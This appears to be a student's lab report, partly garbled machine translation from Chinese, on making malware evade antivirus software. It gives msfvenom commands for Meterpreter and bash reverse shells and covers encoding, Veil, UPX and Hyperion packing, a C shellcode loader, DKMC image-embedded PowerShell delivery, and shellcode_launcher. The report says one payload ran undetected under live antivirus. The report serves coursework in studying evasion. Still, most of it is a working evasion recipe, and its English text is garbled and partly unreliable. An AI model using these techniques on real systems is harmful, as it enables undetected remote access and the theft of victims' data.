Exp3 free to kill Principles and Practice
A practice requirements
1. Methods
① the proper use of msf encoder
②msfvenom other documents generated jar or the like
③veil
④ shell tool
⑤ programming using C + shellcode
⑥ other classroom does not describe the method
2. malicious code implemented by various techniques in combination to kill Free
3. In the case of soft kill on, and run back to the other computers connected successfully with the measured, indicated to kill the soft name and version of your computer
Second, the experimental content
1. Methods
① the proper use of msf encoder
(1) will be used on an experimental msfgenerated backdoor into virustotal testing and found that the vast majority of anti-virus software can identify it as a virus, this virus can almost be said to be the Ship Even Sank die first, it was just entering soft kill to kill.
(2) Then we started using msf encoder:
- View encoding type that can be made: msfvenom --list Encoders
- Use x86 / shikata_ga_nai way to encode
- Primary编码: Msfvenom -P Windows / Meterpreter / Reverse_tcp -E X86 / Shikata_ga_nai-B ' \ x00 ' LHOST = 192.168 . 81.129 LPORT = 5113 -F Exe> 20175113Cd2.Exe
- 8-order编码: Msfvenom -P Windows / Meterpreter / Reverse_tcp -E X86 / Shikata_ga_nai -I 8 -B ' \ x00 ' LHOST = 192.168 . 81.129 LPORT = 5113 -F Exe> 20175113Cd2.Exe
- The file is encoded into two virustotal testing, the results still did not change much
- In summary, only the payload generated by the encoding method is impossible to avoid killing
②msfvenom other documents generated jar or the like
- Java files generated: msfvenom -p Java / Meterpreter / reverse_tcp lhost = 192.168 . 81.129 LPORT = 5113 X> 20175113_ja.jar
- It is observed that the rate of killing is better than the simple encoding, but still not optimistic
- Generating a bash file: msfvenom -p cmd / UNIX / reverse_bash lhost = 192.168 . 81.129 LPORT = 5113 -f RAW> 20,175,113 .sh
- bash is the Linux system script, in the Windows environment may not be realized general was installed to run bash, so it will not kill the soft recording of such documents, the killing rate 0
- Use msfvenom generate more types of backdoor please see the blog
③veil
- veil installation simple but obviously too bothered, online installation veil on Kali: sudo APT- GET install veil-Evasion
- After installation into the interface: Veil
- 使用veil-evasion: use 1
- We have observed 41 payload, may be used list view the payload and the use of use of digital select the corresponding payload
- Select PowerShell / Meterpreter / rev_tcp: use 22 is
- Set parameters rebound connection:
- ip: set LHOST 192.168.81.129
- Port: the SET LPORT 5113
- Generation: the Generate
- File Name: 20175113
- For document scanning, the result was not satisfactory
④ shell tool
- ① program generated compression packers shell upx: upx 20175113cd2.exe -o 20175113cd2.upxed.exe
- ① program generated encrypted housing shell Hyperion
- Will be copied to the encrypted program hyperion folder: cp 20175113cd2.exe /usr/share/windows-resources/hyperion/20175113cd2.exe
- Hyperion into the folder: cd / usr / report this content share / Windows-Resources / hyperion /
- A program encryption shell: Wine hyperion.exe -v 20175113cd2.exe 20175113cd2.upxed.Hy.exe
⑤ programming using C + shellcode
- Msfvenom generated using the shellcode: msfvenom -p Windows / Meterpreter / reverse_tcp lhost = 192.168 . 81.129 LPORT = 5113 -fc
- 5113sc.c a new file, the generated above buf [] is substituted into the internal code:
#include <stdio.h> unsigned char buf[]=//生成的shellcode int main() { int (*func)()=(int(*)())buf;//调用shellcode func(); }
- 安装mingw-w64: apt-get install mingw-w64
- 使用
mingw-w64将c文件生成exe文件: i686-w64-mingw32-g++ 5113sc.c -o 5113sc.exe - 对5113sc.exe检测一下
- 按照实验二步骤尝试回连,发现回连成功
⑥使用其他课堂未介绍方法
下面介绍的DKMC方法是一种未成功免杀的方法,具体方法参考教程
- 安装DKMC: git clone https://github.com/Mr-Un1k0d3r/DKMC.git
- 使用Msf生成raw格式的shellcode: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.81.129 LPORT=5113 -f raw > 5113
- 进入DKMC文件夹: cd /home/20175113wr/DKMC/
- 执行: python dkmc.py
- 在DKMC中输入选项: sc
- 设置source: set source /home/20175113wr/5113
- 生成shellcode: run
- 返回主菜单: exit
- 在DKMC中输入选项: gen
- 设置shellcode: set shellcode .....(shellcode为run生成的shellcode)
- 生成图像: run
- 返回主菜单: exit
- 在DKKMC中输入选项: ps
- 设置url地址: set url http://192.168.81.129:8080/ .bmp(图片名为gen生成的图片名,可以手动重命名)
- 生成bat文件: run
- 返回主菜单: exit
- 在DKKMC中输入选项: web
- 设置端口: set port 8080
- 启动web服务: run
- 启动msfconsole
- 将生成的bat文件在windows环境打开(或者命令提示符直接输入生成的powershell的代码)
- 这种方法不能免杀
- 关闭杀软的情况下,能成功回连
- 这种将shellcode嵌入图片,通过网络分发的方法是课堂上没有提过的,失败的原因可能是因为企图调用powershell,而av和win10机制对这种行为极为敏感,所以难以达到免杀的目的
2.通过组合应用各种技术实现恶意代码免杀&3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
这是一种使用shellcode加载器的方法,具体步骤参考教程,shellcode加载器中效果最好使用较多的就是shellcode_launcher了(附上下载地址)
- 使用Msfvenom生成raw格式的shellcode: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.81.129 lport=5113 -f raw -o 20175113.raw
- 打开msfconsole进行监听:
use exploit/multi/handler //监听设置payload set payload set payload windows/meterpreter/reverse_tcp //使用与生成后门程序一样的payload set LHOST 192.168.81.129 //Linux端的IP地址 set LPORT 5113 //与之前输入的端口号一致 exploit //开始监听
- 在另一台正常开启杀软的Windows命令提示符输入: shellcode_launcher.exe -i 20175113.raw
- 观察到成功回连,杀软没有查杀,且shellcode_launcher.exe和20175113.raw通过检测
- Windows版本:Windows 10, version 1909,杀软:火绒5.0.40.12
三、基础问题回答
1.杀软是如何检测出恶意代码的?
(一)特征代码法:该方法是目前杀毒工具中必备的组成部分
(二)校验和法:文件完整性保护,主要用于检测系统文件是否被篡改。
(三)行为监测法:监测恶意代码执行时的行为特征,可以识别恶意代码的名称或者是种类,也可以检测未知的恶意代码。
2.免杀是做什么?
免杀是可以使杀毒软件无法检测到其为病毒程序,从而可以使其“正常运行”
3.免杀的基本方法有哪些?
(1)采用不同的编码方式,或者编码次数
(2)对编码后生成的文件进行加壳,加压缩壳或者是加密壳
(3)还可以使用反弹端口,一些防火墙不会对本机发出的请求进行过滤
4.开启杀软能绝对防止电脑中恶意代码吗?
开启杀软并不能绝对防止电脑中恶意代码,不过及时更新杀软,少打开不安全的链接、少下载盗版软件,还是能大大降低中招的几率。
四、实验体会
这次实验让我见识到了各式各样的防杀技巧,杀软在现在网络信息时代是非常重要的,但单单依靠杀软是力不能逮的,对恶意代码有一定的了解,才能有的放矢,不至于被泄露隐私。